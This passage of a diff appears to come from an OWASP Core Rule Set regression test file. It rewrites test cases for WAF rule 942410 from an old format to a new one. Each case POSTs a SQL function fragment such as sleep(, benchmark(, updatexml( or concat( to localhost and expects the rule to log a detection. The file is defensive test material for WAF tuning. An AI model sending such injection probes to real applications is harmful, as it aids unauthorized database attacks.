text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 
942410-64 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "name_const(" - version: HTTP/1.0 - output: 
- log_contains: id "942410" - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password/?(" - version: 
HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pow(" 
- version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - 
data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - stage: - 
input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-113 - 
desc: "SQL Injection Attack"
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=VALUES%28"
- version: HTTP/1.0
- output:
- log_contains: id "942410"
- - test_title: 942410-114
- desc: "SQL Injection Attack"
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=version%3D%28"
- version: HTTP/1.0
- output:
- log_contains: id "942410"
- - test_title: 942410-115
- desc: "SQL Injection Attack"
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=version%28"
- version: HTTP/1.0
- output:
- log_contains: id "942410"
- - test_title: 942410-116
- desc: "SQL Injection Attack"
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=xmltype%28"
- version: HTTP/1.0
- output:
- log_contains: id "942410"
- - test_title: 942410-117
- desc: "SQL Injection Attack"
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=XMLType%28"
- version: HTTP/1.0
- output: 
- log_contains: id "942410"
- - test_title: 942410-118
- desc: "SQL Injection Attack"
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=year%5D%3D%28"
- version: HTTP/1.0
- output:
- log_contains: id "942410"
+ - test_id: 1
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "ABS("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 2
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "benchmark("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 3
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "BENChmARk("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 4
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "cast("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 5
+ 
desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "CAST("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 6
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "char("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 7
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "chaR("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 8
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "chr("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 9
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "CHR("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 10
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ 
Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "COALESCE("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 11
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "Compress ("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 12
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "concat ("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 13
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "cOnCaT("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 14
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "concat_ws("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942410]
+ - test_id: 15
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
